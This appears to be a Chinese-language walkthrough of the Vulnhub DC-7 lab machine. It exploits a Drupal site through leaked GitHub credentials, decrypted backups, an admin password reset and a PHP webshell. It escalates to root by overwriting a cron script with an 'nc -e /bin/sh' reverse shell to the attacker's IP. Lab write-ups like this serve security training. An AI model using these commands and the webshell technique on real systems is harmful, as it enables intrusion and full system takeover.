靶机IP:192.168.20.141
kaliIP:192.168.20.128
网络有问题的可以看下搭建Vulnhub靶机网络问题(获取不到IP)
前言
1和7都是Drupal的网站,只写了7,包含1的知识点
信息收集
用nmap扫描端口及版本号
进入主页查看作者给的提示,不是暴力破解的思路
在这个网站逛逛看看dirsearch扫出来的目录,最后看到页面左下角的@DC7USER
用谷歌搜素,搜到了一个github用户
进入主页查看项目,看到作者的readme(找对地方了)
观察这些文件,查看敏感文件config.php
获得了用户dc7user
密码MdR3xOgB7#dW
。
漏洞利用
用这组用户名密码尝试登陆,后台登录无效,ssh登陆成功
提权
ls看下目录发现,有个backups文件夹和mbox文件
看下mbox文件是存的是mail信息,root运行/opt/scripts/backups.sh脚本的日志,一直在循环打印,像是个计划任务执行。
bash
dc7user@dc-7:~$ ls
backups mbox
dc7user@dc-7:~$ cat mbox
From root@dc-7 Thu Aug 29 17:00:22 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:00:22 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3EPu-0000CV-5C
for root@dc-7; Thu, 29 Aug 2019 17:00:22 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EPu-0000CV-5C@dc-7>
Date: Thu, 29 Aug 2019 17:00:22 +1000
Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists
查看mail,一直在循环发邮件,应该是个计划任务执行。那么能不能直接在这个计划任务中加入反弹shell命令去提权呢?
我们到脚本路径下查看脚本
这里这个drush命令,是简化了创建和管理Drupal8网站的命令行工具。参考使用Drush
后面会用到
脚本权限,我们现在的权限无法写入数据,但是web权限的用户就可以了,只要我们拿到web权限应该就可以通过计划任务提权到root了。
bash
dc7user@dc-7:/opt/scripts$ ls -l
total 4
-rwxrwxr-x 1 root www-data 520 Aug 29 2019 backups.sh
之后拿后台admin密码有多种方法
覆盖admin密码
带着这个思路再去备份文件夹下看看,是两个加密文件
bash
dc7user@dc-7:~$ cd backups/
dc7user@dc-7:~/backups$ ls
website.sql.gpg website.tar.gz.gpg
发现加密文件正是这个脚本生成的用的是gpg,那么我们用gpg解密文件
bash
dc7user@dc-7:~/backups$ gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --decrypt /home/dc7user/backups/website.sql.gpg > /home/dc7user/backups/website.sql
gpg: AES256 encrypted data
gpg: encrypted with 1 passphrase
dc7user@dc-7:~/backups$ ls
website.sql website.sql.gpg website.tar.gz.gpg
dc7user@dc-7:~/backups$ gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --decrypt /home/dc7user/backups/website.tar.gz.gpg > /home/dc7user/backups/website.tar.gz
gpg: AES256 encrypted data
gpg: encrypted with 1 passphrase
dc7user@dc-7:~/backups$ ls
website.sql website.sql.gpg website.tar.gz website.tar.gz.gpg
之后看下drupal网站配置文件
bash
$databases['default']['default'] = array (
'database' => 'd7db',
'username' => 'db7user',
'password' => 'yNv3Po00',
'prefix' => '',
'host' => 'localhost',
'port' => '',
'namespace' => 'Drupal\\Core\\Database\\Driver\\mysql',
'driver' => 'mysql',
);
$config_directories['sync'] = 'sites/default/files/config_yQDLLJdPf9UT4DSAB5Wfl6XeoBn0AqtLqUYyVc4KUWQW-3USMUdXWY0UZmZ3Az5mT_DMS955DQ/sync';
dc7user@dc-7:~/backups/html/sites/default$
拿到数据库密码进数据库看看
bash
dc7user@dc-7:~/backups/html/sites/default$ mysql -u db7user -pyNv3Po00
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 10270
Server version: 10.1.38-MariaDB-0+deb9u1 Debian 9.8
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
sql语句就不贴了,发现网站用户密码放在users_field_data表中
我们自己生成个简单的密码,用网站加密机制加密后放入数据库,关于哈希值的生成参考Drupal 8 → How to manually reset an admin password on CentOS
bash
dc7user@dc-7:~$ cd /var/www/html/core/
assets/ config/ includes/ lib/ misc/ modules/ profiles/ scripts/ tests/ themes/
dc7user@dc-7:~$ cd /var/www/html/core/scripts/
dc7user@dc-7:/var/www/html/core/scripts$ php password-hash.sh "123456"
password: 123456 hash: $S$E2meigPYO.Bw2Zai46ONGUKwR/OGZ5naeJS0aQLGkdloQnkFi3WX
dc7user@dc-7:/var/www/html/core/scripts$
之后覆盖admin的密码
回到登录页进行登录,可能会发现,等不不进去的情况,清一下缓存。就可以登录了
bash
MariaDB [d7db]> truncate table flood;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id: 27
Current database: d7db
Query OK, 0 rows affected (0.14 sec)
MariaDB [d7db]> truncate table cache_entity;
Query OK, 0 rows affected (0.06 sec)
字典爆破密码
这个在DC-1中可以尝试hashcat,john爆破下后台root密码。
drush修改管理员密码
参考使用Drush
bash
drush upwd admin --password="123456"
drush
登录到后台之后,有extends可以下载拓展包,我们下载https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
下载完之后记得在list页面,enable一下php
之后我们去编辑文章将一句话木马写到文章内容中,text fomat选择PHP code
之后保存,并访问文章,发现php语句被解析
用蚁剑连接
靶机是有nc的,反弹shell
接下来就可以到咱们前边的思路了,有了web权限,就可以进行计划任务执行
bash
www-data@dc-7:/opt/scripts$ ls
ls
backups.sh
www-data@dc-7:/opt/scripts$ echo 'nc -e /bin/sh 192.168.20.128 7777' > backups.sh
<ho 'nc -e /bin/sh 192.168.20.128 7777' > backups.sh
www-data@dc-7:/opt/scripts$ cat backups.sh
cat backups.sh
nc -e /bin/sh 192.168.20.128 7777
之后kali监听等待